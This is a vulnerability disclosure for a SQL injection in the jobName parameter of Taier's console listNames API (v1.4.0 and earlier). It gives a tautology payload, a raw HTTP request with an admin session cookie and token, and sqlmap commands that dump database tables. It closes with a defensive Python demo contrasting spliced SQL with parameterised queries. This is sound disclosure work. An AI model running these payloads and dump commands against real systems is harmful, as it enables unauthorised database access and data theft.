nerowander
<= v1.4.0
https://github.com/DTStack/Taier
https://github.com/DTStack/Taier/releases/download/v1.4.0/taier.tar.gz
Taier versions up to and including v1.4.0 have a SQL injection vulnerability in the jobName parameter of the /taier/api/console/listNames console interface.
Payload: jobName=111%27or/**/1=1%23 (URL-decoded: 111'or/**/1=1# ; the /**/ stands in for a space and # starts a MySQL line comment)
POST /taier/api/console/listNames?jobName=111%27or/**/1=1%23 HTTP/1.1
Host: 127.0.0.1:8090
sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: userId=1; username=admin%40dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier
Response:
(The response body is shown as a screenshot in the original report.) With jobName set to 111, which matches no job, a correct implementation would return nothing. Instead, the injected ' or 1=1 turns the WHERE condition into a tautology that every row satisfies, and the trailing # comments out whatever the application appends after the parameter, so the endpoint returns every job name with is_deleted=0. This is the classic "universal password" pattern. The bbb and ccc names in the response are test data that were inserted directly into the database with an INSERT statement beforehand.
The request can be sent by hand (as above) or the extraction can be automated with sqlmap; the sqlmap commands follow and reproduce the same results. Note the Cookie header in the request: it carries an admin session (userId=1, username admin@dtstack.com, a JWT token), so the injection is post-authentication and the same cookie must be passed to sqlmap with --cookie.
Get the current database name
python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST
Get all table names
python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST -D "taier" --tables
Get all the data of a certain table (here, take the schedule_job_cache table as an example)
python3 sqlmap.py -u "http://127.0.0.1:8090/taier/api/console/listNames?jobName=1" --cookie="userId=1; username=admin@dtstack.com; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ0ZW5hbnRfaWQiOiIxIiwidXNlcl9pZCI6IjEiLCJ1c2VyX25hbWUiOiJhZG1pbkBkdHN0YWNrLmNvbSIsImV4cCI6MTcyMjU0NjM4MCwiaWF0IjoxNzIwNzk0MzgwfQ.v57U_BL7OgrDWQmicdev4YrPADsScy9eKsAJE709bKo; tenantId=1; tenant_name=taier" --dbms mysql --current-db --level 3 --risk 3 -p "jobName" --method=POST -D "taier" -T "schedule_job_cache" --dump
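To make the mechanism behind the "universal password" response and the sqlmap true/false probing concrete, the following added example (written for this page; it is not Taier's code and does not reproduce Taier's actual query) models the listNames lookup twice against an in-memory SQLite table: once splicing jobName into the SQL string (the assumed defect), once with a bound parameter and LIKE-wildcard escaping. The table name schedule_job, the column names and the sample rows are constructed for the demo. Because SQLite does not treat # as a comment, the page's payload is written with SQLite's -- terminator; the tautology is otherwise identical. looks_injectable is the boolean differential check that sqmap performs automatically: a tautology and a contradiction should yield the same result if input never reaches the SQL.

```python
import sqlite3

# Constructed sample data (not from a real Taier database): job names plus a
# soft-delete flag, mirroring the is_deleted=0 filter the report describes.
SAMPLE_JOBS = [
    ("bbb", 0),
    ("ccc", 0),
    ("old_job", 1),
]

# The report's payload 111'or/**/1=1#, with SQLite's "--" line comment in
# place of MySQL's "#".
PAYLOAD = "111'or/**/1=1--"


def make_db():
    """In-memory SQLite database standing in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE schedule_job (job_name TEXT, is_deleted INTEGER)")
    conn.executemany("INSERT INTO schedule_job VALUES (?, ?)", SAMPLE_JOBS)
    conn.commit()
    return conn


def vulnerable_list_names(conn, job_name):
    """Hypothetical lookup that splices jobName straight into the statement.
    A MyBatis ${jobName} placeholder would produce the same SQL. With PAYLOAD
    the WHERE clause becomes  job_name LIKE '%111' or 1=1  and everything
    after the comment marker, including the is_deleted filter, is dropped."""
    sql = (
        "SELECT job_name FROM schedule_job "
        f"WHERE job_name LIKE '%{job_name}%' AND is_deleted = 0"
    )
    return sorted(row[0] for row in conn.execute(sql))


def _escape_like(value, esc="\\"):
    """Escape LIKE metacharacters so user input is matched literally; binding
    alone stops injection but still lets a bare '%' list every job."""
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def safe_list_names(conn, job_name):
    """Same lookup with a bound parameter and an ESCAPE clause."""
    sql = (
        "SELECT job_name FROM schedule_job "
        "WHERE job_name LIKE ? ESCAPE '\\' AND is_deleted = 0"
    )
    pattern = "%" + _escape_like(job_name) + "%"
    return sorted(row[0] for row in conn.execute(sql, (pattern,)))


# Probes for the differential check: a tautology and a contradiction built on
# a name that matches nothing on its own.
TRUE_PROBE = "zzz'or/**/1=1--"
FALSE_PROBE = "zzz'or/**/1=2--"


def looks_injectable(list_names, conn):
    """Boolean-based detection (what sqlmap automates): if a true and a false
    condition produce different results, the input reaches the SQL parser."""
    return list_names(conn, TRUE_PROBE) != list_names(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, jobName=111 :", vulnerable_list_names(db, "111"))
    print("vulnerable, payload     :", vulnerable_list_names(db, PAYLOAD))
    print("safe, payload           :", safe_list_names(db, PAYLOAD))
    print("safe, jobName=%         :", safe_list_names(db, "%"))
    print("vulnerable injectable?  :", looks_injectable(vulnerable_list_names, db))
    print("safe injectable?        :", looks_injectable(safe_list_names, db))
```

The vulnerable variant returns the deleted row as well, because the comment marker discards the is_deleted filter; whether Taier's real query keeps or loses that filter depends on clause order, which this example does not claim to reproduce. The hardened variant returns nothing for the payload and also refuses to treat a bare % as a wildcard.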